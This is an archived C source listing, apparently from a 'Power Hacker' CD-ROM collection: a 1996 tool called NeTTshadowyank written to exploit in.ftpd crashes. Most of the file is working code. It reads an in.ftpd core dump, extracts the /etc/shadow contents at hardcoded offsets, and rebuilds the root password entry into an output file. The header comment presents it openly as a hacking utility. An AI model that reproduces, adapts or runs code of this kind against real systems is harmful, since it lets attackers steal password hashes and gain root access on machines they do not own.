home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / shadowyank.c < prev    next >
Encoding:
C/C++ Source or Header  |  2001-11-06  |  5.4 KB  |  173 lines
  1. /* NeTTshadowyank.c, by NeTTwerk (nettwerk@spyder.org)
  2.    Oct 17, 1996
  3.    Released into the Public Domain (not for use with some sets)
  4.                               **NeTTshadowyank**
  5.                                  Version 1.0
  6.                               nettwerk@spyder.org
  7.  
  8.   NeTTshadowyank is a simple utility which reads a corefile created by
  9. in.ftpd, and pulls out the shadow file 8).. it also reconstructs the root
  10. password (which is corrupted in the shadow entry buffer), and puts it
  11. in the appropriate place in the targetfile 'NeTTshadowyank.shadow'.
  12.  
  13.   This is a really brainless program from the perspective that it does
  14. very *little* inteligence... Version 2.0, will have my infamous
  15. 'heuristics engine' which will *look* for shadow entries/passwd entries
  16. in the binary file.
  17.  
  18.   (btw: if you dont know *how* to make in.ftpd dump core with the shadow
  19. file inside it, tough luck)
  20.  
  21.   Greets for this little util go out for BioH,mudge,glyph (all the l0pht guys),
  22. bika,k,rommel,hobbit and of course,whoever wrote in.ftpd ;)
  23.  
  24. latah.
  25.  
  26. questions can be sent to nettwerk@spyder.org
  27. */
  28.  
  29. #include <stdio.h>
  30. #include <stdlib.h>
  31. #include <sys/types.h>
  32. #include <malloc.h>
  33. #include <unistd.h>
  34. #include <sys/elftypes.h>
  35. #include <elf.h>
  36. #include <fcntl.h>
  37. #include <sys/stat.h>
  38.  
  39. #define ROOT_OFFSET 0xd7d4
  40. #define SHADOW_OFFSET 0xfadb
  41. void main(argc,argv)
  42. int argc;
  43. char **argv;
  44. {
  45.         FILE *fp;
  46.         FILE *fp2;
  47.         char SZ_line[255];
  48.         Elf32_Ehdr *Telf32_hdr;
  49.         int I_fd;
  50.         void *Vp_buff;
  51.         struct stat Sstat_buf;
  52.         char *Cp_ptr;
  53.  
  54.         if (argc!=2)
  55.                 {
  56.                 printf("[NeTTshadowyank] Usage: %s corefilename\n",argv[0]);
  57.                 exit(0);
  58.                 }
  59.         if ((I_fd=open(argv[1],O_RDONLY))<0)
  60.                 {
  61.                 perror("Opening Corefile");
  62.                 exit(0);
  63.                 }
  64.         if (fstat(I_fd,&Sstat_buf)<0)
  65.                 {
  66.                 perror("fstat()'ing file");
  67.                 exit(0);
  68.                 }
  69.         printf("[NeTTshadowyank] Loading %s, size %d bytes\n",argv[1],Sstat_buf
  70. .st_size);
  71.         if (!(Vp_buff=malloc(Sstat_buf.st_size)))
  72.                 {
  73.                 printf("Out of Memory\n");
  74.                 exit(0);
  75.                 }
  76.         memset(Vp_buff,0,Sstat_buf.st_size);
  77.         if (read(I_fd,(char *)Vp_buff,Sstat_buf.st_size)<0)
  78.                 {
  79.                 perror("Reading corefile");
  80.                 exit(0);
  81.                 }
  82.         Telf32_hdr = (Elf32_Ehdr *)Vp_buff;
  83.         printf("File Type ->%c%c%c%c\n",Telf32_hdr->e_ident[EI_MAG0]
  84.  
  85.                                                   ,Telf32_hdr->e_ident[EI_MAG1]
  86.  
  87.                                                   ,Telf32_hdr->e_ident[EI_MAG2]
  88.  
  89.                                                   ,Telf32_hdr->e_ident[EI_MAG3]
  90. );
  91.  
  92.         printf("File Class->0x%x",Telf32_hdr->e_ident[EI_CLASS]);
  93.  
  94.         if (Telf32_hdr->e_ident[EI_CLASS]==1)
  95.                 printf(" (32 Bit Binary)\n");
  96.         else if (Telf32_hdr->e_ident[EI_CLASS]==2)
  97.                 printf(" (64 Bit Binary)\n");
  98.         else
  99.                 printf(" (BAD Binary)\n");
  100.  
  101.         printf("File Data ->0x%x",Telf32_hdr->e_ident[EI_DATA]);
  102.  
  103.   if (Telf32_hdr->e_ident[EI_DATA]==1)
  104.     printf(" (Least Significant Bit)\n");
  105.   else if (Telf32_hdr->e_ident[EI_DATA]==2)
  106.     printf(" (Most Significant Bit)\n");
  107.   else
  108.     printf(" (BAD Binary)\n");
  109.  
  110.         printf("File Vers ->0x%x\n",Telf32_hdr->e_ident[EI_VERSION]);
  111.         printf("File Type ->0x%x",Telf32_hdr->e_type);
  112.         if (Telf32_hdr->e_type==1)
  113.                 printf(" (Relocatable Executable)\n");
  114.         else if (Telf32_hdr->e_type==2)
  115.                 printf(" (EXEC Executable)\n");
  116.         else if (Telf32_hdr->e_type==3)
  117.                 printf(" (Dynamic Executable)\n");
  118.         else if (Telf32_hdr->e_type==4)
  119.                 printf(" (Core Dump [Post-Mortem])\n");
  120.         else if (Telf32_hdr->e_type==5)
  121.                 printf(" (Numeric Executable)\n");
  122.         else
  123.                 printf(" (Unknown Binary Format)\n");
  124.  
  125.         Cp_ptr=Vp_buff+ROOT_OFFSET;
  126.         printf("Root Password location (%s) ->%s\n",ROOT_OFFSET,Cp_ptr);
  127.  
  128.         printf("Reconstructing shadow file\n");
  129.         if (!(fp=fopen("NeTTshadowyank.scratch","w")))
  130.                 {
  131.                 perror("Creating scratch file");
  132.                 exit(0);
  133.                 }
  134.         Cp_ptr=Vp_buff+SHADOW_OFFSET;
  135.         while(1)
  136.                 {
  137.                 if (!strncmp(Cp_ptr,"lic_key",7))
  138.                         break;
  139.                 if (*Cp_ptr=='#')
  140.                         break;
  141.                 if (*Cp_ptr==0)
  142.                         fprintf(fp," ");
  143.                 else
  144.                         fprintf(fp,"%c",*Cp_ptr);
  145.                 Cp_ptr++;
  146.                 }
  147.         fclose(fp);
  148.         if (!(fp=fopen("NeTTshadowyank.scratch","r")))
  149.     {
  150.     perror("Opening Scratch File");
  151.     exit(0);
  152.     }
  153.   if (!(fp2=fopen("NeTTshadowyank.shadow","w")))
  154.     {
  155.     perror("Creating target file");
  156.     exit(0);
  157.     }
  158.   while(fgets(SZ_line,sizeof(SZ_line),fp))
  159.                 {
  160.                 SZ_line[(strlen(SZ_line)-1)]=0;
  161.                 if (!strncmp(SZ_line,"root",4))
  162.                         {
  163.                         Cp_ptr=Vp_buff+ROOT_OFFSET;
  164.                         printf("[NeTTshadowyank] Repairing Root Shadow Entry\n"
  165. );
  166.                         fprintf(fp2,"root:%s:0::::::\n",Cp_ptr);
  167.                         }
  168.                 else
  169.                         fprintf(fp2,"%s\n",SZ_line);
  170.                 }
  171. }
  172.  
  173.